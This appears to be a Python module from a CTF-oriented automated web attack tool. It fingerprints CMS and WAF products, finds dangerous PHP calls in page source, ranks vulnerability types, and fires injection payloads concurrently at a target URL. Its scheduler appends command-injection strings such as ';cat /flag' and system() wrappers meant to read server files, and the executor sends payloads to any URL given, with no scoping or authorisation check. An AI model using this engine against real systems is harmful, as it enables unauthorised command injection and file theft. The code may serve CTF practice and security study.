# -*- coding: utf-8 -*-
"""url_analyzer._engines -- Smart fingerprinting, single-attack execution, concurrency and scheduling.

从 yang_web/core/url_analyzer.py 机械拆分而来, 逐行搬运, 行为等价。
"""

from urllib.parse import urlparse, parse_qs, unquote, urlencode, urlunparse, quote
from urllib.error import URLError, HTTPError
from typing import List, Dict, Tuple, Optional, Callable
from concurrent.futures import ThreadPoolExecutor, as_completed, TimeoutError as FuturesTimeoutError
import re
import socket
import time
import threading
import html as _html

from ._http import (DEFAULT_TIMEOUT, FLAG_RE, analyze_response, inject_payload, send_request)
from ._signatures import (ATTACK_PAYLOADS)

class SmartFingerprinter:
    """Detect CMS, WAF, framework, and source-level vulnerability patterns.

    Analyzes HTTP response headers and body to identify:
    - CMS/框架 (WordPress, ThinkPHP, Flask, Django, etc.)
    - WAF (阿里云, Cloudflare, 360, ModSecurity)
    - PHP source patterns: system/exec/eval/shell_exec/passthru
    - PHP superglobals: $_GET/$_POST/$_REQUEST 参数
    - HTTP method hints: POST/GET from source code
    - File inclusion patterns
    """

    # ── CMS / Framework fingerprints from headers + body ──
    CMS_FINGERPRINTS = [
        (r'wp-content|wp-includes|/wp-json|/wp-admin', 'WordPress', ['PHP', 'SQLi', 'Upload'], 80),
        (r'X-Powered-By:\s*ThinkPHP|thinkphp|ThinkPHP', 'ThinkPHP', ['SQLi', 'RCE', 'LFI'], 75),
        (r'X-Powered-By:\s*PHP/\d|PHPSESSID', 'PHP原生', ['PHP', 'RCE', 'LFI'], 60),
        (r'flask|werkzeug|jinja2|__debugger__', 'Flask', ['SSTI', 'SSRF', 'LFI'], 80),
        (r'django|csrftoken|__debug__|django_language', 'Django', ['SSTI', 'SQLi', 'SSRF'], 75),
        (r'laravel|XSRF-TOKEN|laravel_session', 'Laravel', ['SQLi', 'SSTI', 'SSRF'], 75),
        (r'JSESSIONID|jsessionid|org\.springframework|spring-boot', 'Spring/Java', ['SSTI', 'SSRF', 'SQLi'], 70),
        (r'X-Powered-By:\s*Express|node\.js|nodejs', 'Express/Node', ['SSTI', 'SSRF', 'NoSQLi'], 65),
        (r'ASP\.NET|ASPSESSIONID|__VIEWSTATE|X-AspNet', 'ASP.NET', ['SQLi', 'Upload', 'SSRF'], 65),
        (r'nginx|apache|tomcat|iis', 'Generic', ['SQLi', 'XSS', 'RCE'], 30),
    ]

    # ── WAF fingerprints ──
    WAF_PATTERNS = [
        (r'aliyun|yundun|ALI-SW-|Alibaba|AliyunWAF', '阿里云WAF'),
        (r'cf-ray|__cfduid|cloudflare-nginx|cf-cache-status', 'Cloudflare'),
        (r'360wzws|wangzhan\.360|360 web server', '360WAF'),
        (r'Mod_Security|mod_security|This error was generated by Mod_Security', 'ModSecurity'),
        (r'TencentCloudWAF|[Tt]encent[Ww]af|[Tt]-[Ss]ec', '腾讯云WAF'),
        (r'BaishanCloud|BWS-FAIL|bwstest', '白山云WAF'),
        (r'Yunjiasu|yunjiasu-nginx', '云加速/创宇'),
        (r'SafeDog|safedog|WAF/\d\.\d', '安全狗'),
        (r'DDoS-GUARD|ddos-guard', 'DDoS-Guard'),
        (r'F5|BIG-IP|BIGIP|ASM-WAF', 'F5 BIG-IP ASM'),
    ]

    # ── PHP source code vulnerability patterns ──
    PHP_DANGEROUS_FUNCTIONS = [
        (r'system\s*\(', 'RCE', 95, 'system() 命令执行'),
        (r'exec\s*\(', 'RCE', 95, 'exec() 命令执行'),
        (r'shell_exec\s*\(', 'RCE', 95, 'shell_exec() 命令执行'),
        (r'passthru\s*\(', 'RCE', 90, 'passthru() 命令执行'),
        (r'popen\s*\(', 'RCE', 85, 'popen() 命令执行'),
        (r'proc_open\s*\(', 'RCE', 85, 'proc_open() 命令执行'),
        (r'eval\s*\(', 'RCE', 90, 'eval() 代码执行'),
        (r'assert\s*\(', 'RCE', 85, 'assert() 代码执行'),
        (r'preg_replace\s*\([^)]*/e', 'RCE', 85, 'preg_replace /e 代码执行'),
        (r'call_user_func\s*\(', 'RCE', 80, 'call_user_func() 回调执行'),
        (r'create_function\s*\(', 'RCE', 80, 'create_function() 代码执行'),
        (r'include\s*\(\s*\$', 'LFI', 85, 'include 变量文件包含'),
        (r'require\s*\(\s*\$', 'LFI', 85, 'require 变量文件包含'),
        (r'include_once\s*\(\s*\$', 'LFI', 80, 'include_once 变量文件包含'),
        (r'require_once\s*\(\s*\$', 'LFI', 80, 'require_once 变量文件包含'),
        (r'file_get_contents\s*\(\s*\$', 'SSRF', 80, 'file_get_contents 变量 → SSRF'),
        (r'unserialize\s*\(', 'PHP', 80, 'unserialize() 反序列化'),
        (r'highlight_file\s*\(|show_source\s*\(', 'PHP', 60, 'highlight_file 源码泄露'),
        (r'mysql_query\s*\(|mysqli_query\s*\(|->query\s*\(', 'SQLi', 75, 'SQL查询函数'),
        (r'SELECT.*FROM.*WHERE.*\$|INSERT.*INTO.*\$', 'SQLi', 80, 'SQL拼接 → SQL注入'),
    ]

    # ── PHP superglobal detection ──
    PHP_SUPERGLOBALS = [
        (r'\$_GET\[["\'](\w+)["\']', 'GET'),
        (r'\$_POST\[["\'](\w+)["\']', 'POST'),
        (r'\$_REQUEST\[["\'](\w+)["\']', 'REQUEST'),
        (r'\$_COOKIE\[["\'](\w+)["\']', 'COOKIE'),
    ]

    def __init__(self):
        self.last_results = {}

    def fingerprint(self, headers: Dict, body: str, url: str = "") -> Dict:
        """Run full fingerprinting: CMS + WAF + source patterns.

        Returns:
            {"cms": str, "cms_confidence": int, "waf": str or None,
             "php_vulns": [{"type":str, "confidence":int, "reason":str, "evidence":str}],
             "php_params": [{"name":str, "method":str}],
             "server": str, "tech_stack": [str]}
        """
        # Strip HTML tags for source analysis
        clean_body = re.sub(r'<[^>]+>', '', body)
        # Decode ALL HTML entities (nbsp, lt, gt, amp, etc.)
        import html as _html
        clean_body2 = _html.unescape(clean_body)

        headers_text = '\n'.join(f'{k}: {v}' for k, v in headers.items())
        combined = headers_text + '\n' + clean_body2[:10000]

        result = {
            'cms': 'Unknown', 'cms_confidence': 0, 'waf': None,
            'php_vulns': [], 'php_params': [],
            'server': headers.get('Server', 'Unknown'),
            'tech_stack': [],
        }

        # ── Detect WAF ──
        for pattern, waf_name in self.WAF_PATTERNS:
            if re.search(pattern, combined, re.IGNORECASE):
                result['waf'] = waf_name
                break

        # ── Detect CMS/Framework ──
        best_cms, best_conf = 'Unknown', 0
        for pattern, cms, related_vulns, conf in self.CMS_FINGERPRINTS:
            if re.search(pattern, combined, re.IGNORECASE):
                if conf > best_conf:
                    best_cms, best_conf = cms, conf
                    result['tech_stack'] = related_vulns
        result['cms'] = best_cms
        result['cms_confidence'] = best_conf

        # ── Detect PHP dangerous functions in source ──
        for pattern, vtype, conf, reason in self.PHP_DANGEROUS_FUNCTIONS:
            matches = list(re.finditer(pattern, clean_body2))
            if matches:
                evidence = matches[0].group(0)[:60]
                result['php_vulns'].append({
                    'type': vtype, 'confidence': conf,
                    'reason': reason, 'evidence': evidence,
                    'count': len(matches),
                })

        # ── Extract PHP superglobal params ──
        for pattern, method in self.PHP_SUPERGLOBALS:
            for m in re.finditer(pattern, clean_body2):
                name = m.group(1)
                if not any(p['name'] == name for p in result['php_params']):
                    result['php_params'].append({'name': name, 'method': method})

        # Store clean source for PHP logic analysis
        result['_clean_source'] = clean_body2
        self.last_results = result
        return result



class ConcurrentEngine:
    """Thread-pool HTTP engine for parallel attack execution.

    Features:
    - Parallel request execution via ThreadPoolExecutor
    - Automatic retry with exponential backoff
    - Graceful timeout handling
    - Result aggregation with dedup
    - Flag detection in any response
    """

    def __init__(self, max_workers: int = 15, timeout: int = 5, retries: int = 2):
        self.max_workers = max_workers
        self.timeout = timeout
        self.retries = retries
        self.flag_re = FLAG_RE
        self.cancelled = False
        self._lock = threading.Lock()

    def cancel(self):
        """Signal cancellation for all pending tasks."""
        self.cancelled = True

    def reset(self):
        """Reset cancellation flag."""
        self.cancelled = False

    def attack_batch(self, tasks: List[Dict],
                     on_progress: Callable = None,
                     on_flag: Callable = None) -> List[Dict]:
        """Execute multiple attack tasks concurrently.

        Args:
            tasks: List of {"url": str, "param": str, "payload_def": dict,
                            "method": "GET"|"POST", "form_inputs": list}
            on_progress: Callable(stage, item, status)
            on_flag: Callable(flag) — called immediately when flag found

        Returns:
            (results_list, found_flag_or_None)
        """
        if not tasks:
            return [], None

        results = []
        found_flag = [None]  # Use list for thread-safe mutation

        def _run_one(task, idx):
            if self.cancelled or found_flag[0]:
                return None
            try:
                res = self._execute_with_retry(task)
                if res:
                    resp = res.get('response', {})
                    body = resp.get('body', '')
                    # Check for flag immediately
                    if body and not found_flag[0]:
                        flags = self.flag_re.findall(body)
                        if flags:
                            with self._lock:
                                if not found_flag[0]:
                                    found_flag[0] = flags[0]
                            if on_flag:
                                try:
                                    on_flag(flags[0])
                                except Exception:
                                    pass
                    # Progress callback
                    if on_progress:
                        try:
                            name = task.get('payload_def', {}).get('name', f'task#{idx}')
                            analysis = res.get('analysis', {})
                            status = '✓' if analysis.get('success') else '✗'
                            on_progress('attack', name, f'{status} {analysis.get("detail","")[:50]}')
                        except Exception:
                            pass
                return res
            except Exception:
                return None

        with ThreadPoolExecutor(max_workers=min(self.max_workers, len(tasks))) as executor:
            futures = {executor.submit(_run_one, t, i): i for i, t in enumerate(tasks)}
            try:
                for future in as_completed(futures, timeout=self.timeout * 5):
                    if self.cancelled:
                        break
                    r = future.result()
                    if r:
                        results.append(r)
                        # Early exit if flag found
                        if found_flag[0]:
                            break
            except FuturesTimeoutError:
                pass
            except Exception:
                pass
            finally:
                # Cancel remaining futures
                for f in futures:
                    f.cancel()

        return results, found_flag[0]

    def _execute_with_retry(self, task: Dict) -> Optional[Dict]:
        """Execute a single attack with retry logic."""
        url = task['url']
        param = task['param']
        pdef = task['payload_def']
        http_method = task.get('method', 'GET')
        form_inputs = task.get('form_inputs')

        for attempt in range(self.retries + 1):
            try:
                res = execute_attack(url, param, pdef, http_method=http_method,
                                     form_inputs=form_inputs, timeout=self.timeout)
                return res
            except (socket.timeout, URLError, OSError) as e:
                if attempt < self.retries:
                    time.sleep(0.3 * (2 ** attempt))  # Exponential backoff
                else:
                    return {
                        'attack_url': url, 'param': param,
                        'payload_name': pdef.get('name', 'unknown'),
                        'response': {'ok': False, 'error': str(e)},
                        'analysis': {'success': False, 'detail': f'Failed after {self.retries+1} attempts: {e}'},
                    }
            except Exception as e:
                return {
                    'attack_url': url, 'param': param,
                    'payload_name': pdef.get('name', 'unknown'),
                    'response': {'ok': False, 'error': str(e)},
                    'analysis': {'success': False, 'detail': f'Error: {e}'},
                }
        return None



class AdaptiveScheduler:
    """Context-aware attack scheduler.

    Given fingerprint + analysis results, determines:
    - Optimal attack order (most likely vulns first)
    - Which payloads to skip (e.g. no SQLi if source shows pure RCE)
    - HTTP method (GET vs POST based on source analysis)
    - Priority escalation path
    """

    # Priority: vuln types ordered by exploitability in CTF
    CTF_VULN_PRIORITY = [
        'RCE',    # Direct command execution → fastest flag
        'PHP',    # PHP-specific tricks
        'LFI',    # File read → flag or source → RCE
        'SQLi',   # DB extraction → flag table
        'SSTI',   # Template injection → RCE
        'SSRF',   # Internal service access → flag
        'Upload', # File upload → webshell
        'XSS',    # Usually least useful in CTF flag extraction
    ]

    def __init__(self):
        self.fingerprint = None
        self.analysis = None

    def schedule(self, analysis_results: List[Dict],
                 fingerprint: Dict) -> List[Dict]:
        """Generate optimized attack plan.

        Args:
            analysis_results: From analyze_url() → results field
            fingerprint: From SmartFingerprinter.fingerprint()

        Returns:
            List of attack tasks: [{"url", "param", "payload_def", "method", "form_inputs"}]
        """
        self.fingerprint = fingerprint
        self.analysis = analysis_results

        # Detect the likely HTTP method from source code
        php_params = fingerprint.get('php_params', [])
        uses_post = any(p['method'] == 'POST' for p in php_params)
        uses_get = any(p['method'] == 'GET' for p in php_params)

        # Boost confidence for vuln types detected in source
        php_vulns = fingerprint.get('php_vulns', [])
        php_vuln_types = set(v['type'] for v in php_vulns)

        # Merge analysis results with fingerprint boosts
        merged = {}
        for ar in analysis_results:
            vt = ar['type']
            conf = ar['confidence']
            # Boost from source analysis
            if vt in php_vuln_types:
                conf = min(100, conf + 40)
            merged[vt] = {
                'type': vt,
                'confidence': conf,
                'params': ar.get('params', []),
                'payloads': ar.get('payloads', []),
                'type_cn': ar.get('type_cn', vt),
            }

        # Add vulns found only in source (not in original analysis)
        for pv in php_vulns:
            vt = pv['type']
            if vt not in merged:
                # Create entry with params from source
                src_params = [p['name'] for p in php_params]
                merged[vt] = {
                    'type': vt,
                    'confidence': pv['confidence'],
                    'params': src_params if src_params else ['a'],
                    'payloads': ATTACK_PAYLOADS.get(vt, []),
                    'type_cn': {'RCE': '远程命令执行', 'LFI': '文件包含',
                                'SQLi': 'SQL注入', 'PHP': 'PHP漏洞',
                                'SSRF': '服务端请求伪造', 'SSTI': '模板注入',
                                'XSS': '跨站脚本', 'Upload': '文件上传'}.get(vt, vt),
                }

        # Sort by priority then confidence
        def _sort_key(item):
            vt = item[0]
            info = item[1]
            try:
                prio = self.CTF_VULN_PRIORITY.index(vt)
            except ValueError:
                prio = 99
            return (prio, -info['confidence'])

        sorted_vulns = sorted(merged.items(), key=_sort_key)

        # Generate attack tasks
        tasks = []
        url = fingerprint.get('_url', '')
        for vt, info in sorted_vulns:
            if info['confidence'] < 20:
                continue  # Skip low-confidence guesswork
            method = 'POST' if uses_post else 'GET'
            params = info['params'] if info['params'] else ['a']
            payloads = info.get('payloads', [])
            # Limit payloads per type based on confidence
            max_payloads = 8 if info['confidence'] >= 80 else (5 if info['confidence'] >= 60 else 3)
            for param in params[:2]:  # Max 2 params per vuln type
                for pdef in payloads[:max_payloads]:
                    tasks.append({
                        'url': url,
                        'param': param,
                        'payload_def': pdef,
                        'method': method,
                        'form_inputs': None,
                    })

        # Add smart escalation tasks at the end (flag file reads)
        if php_vuln_types & {'RCE', 'LFI', 'PHP'}:
            # Check for eval()-based RCE (needs PHP code, not raw shell)
            php_vulns = fingerprint.get('php_vulns', [])
            is_eval_rce = any('eval()' in v.get('reason', '') for v in php_vulns if v['type'] == 'RCE')
            for flag_cmd in [
                'cat /flag', 'cat /flag.txt', 'cat /fla*', 'cat /f*',
                'cat flag.txt', 'cat flag', 'cat /etc/flag',
                'tac /flag', 'nl /flag', 'head -c 100 /flag',
                'find / -name "flag*" 2>/dev/null',
            ]:
                if is_eval_rce:
                    # eval() needs PHP code: wrap shell in system() or backticks
                    payload = f"system('{flag_cmd}');"
                    ptip = 'eval→system读flag文件'
                else:
                    payload = ';' + flag_cmd
                    ptip = '直接读flag文件'
                tasks.append({
                    'url': url,
                    'param': (params[0] if params else 'a'),
                    'payload_def': {
                        'name': f'flag:{flag_cmd[:20]}',
                        'payload': payload,   # PHP-wrapped for eval, ;prefixed for system
                        'method': 'append',   # append so base value stays + cmd injected
                        'detect': 'content',
                        'match': ['flag{', 'CTF{', 'ISCC{', 'Geesec{', 'DASCTF{'],
                        'tip': ptip,
                    },
                    'method': method,
                    'form_inputs': None,
                })

        return tasks



# ============================================================================
#  Attack Executor
# ============================================================================

def execute_attack(url: str, param: str, payload_def: Dict,
                   http_method: str = "GET",
                   form_inputs: List[Dict] = None,
                   timeout: int = 0) -> Dict:
    """Execute attack: inject payload, send request, analyze response.

    Args:
        url: Target URL
        param: Parameter name to target
        payload_def: Payload definition with name, payload, method, detect, match, tip
        http_method: GET or POST
        form_inputs: List of form input dicts for POST construction

    Returns:
        {"attack_url": str, "param": str, "payload_name": str,
         "response": dict, "analysis": dict}
    """
    payload = payload_def["payload"]
    method = payload_def.get("method", "append")
    detect = payload_def.get("detect", "normal")
    match_words = payload_def.get("match", [])
    post_data = None
    if http_method == "POST":
        # Build POST body from form_inputs or fallback to simple param=payload
        form_dict = {}
        if form_inputs:
            for inp in form_inputs:
                name = inp.get("name", "")
                val = inp.get("value", "")
                if name == param:
                    if method == "replace":
                        form_dict[name] = payload
                    else:
                        form_dict[name] = val + payload
                else:
                    form_dict[name] = val
        else:
            # Simple POST: just the target param
            form_dict[param] = payload
        post_data = urlencode(form_dict).encode("utf-8")
        attack_url = url
    else:
        attack_url = inject_payload(url, param, payload, method)
    req_timeout = timeout if timeout > 0 else DEFAULT_TIMEOUT
    if detect == "timeout":
        req_timeout = 8
    resp = send_request(attack_url, timeout=req_timeout, method=http_method,
                        post_data=post_data)
    if detect == "timeout":
        elapsed = resp.get("elapsed_ms", 0)
        if elapsed > 2500:
            analysis = {
                "success": True, "confidence": "Very High",
                "detail": f"Response time {elapsed}ms (>2500ms) - Sleep injection confirmed"
            }
        else:
            analysis = {
                "success": False, "confidence": "",
                "detail": f"Response time {elapsed}ms, sleep injection not confirmed"
            }
    else:
        analysis = analyze_response(resp.get("body", ""),
                                    {"detect": detect, "match": match_words})
    return {
        "attack_url": attack_url, "param": param,
        "payload_name": payload_def["name"],
        "response": resp, "analysis": analysis,
    }
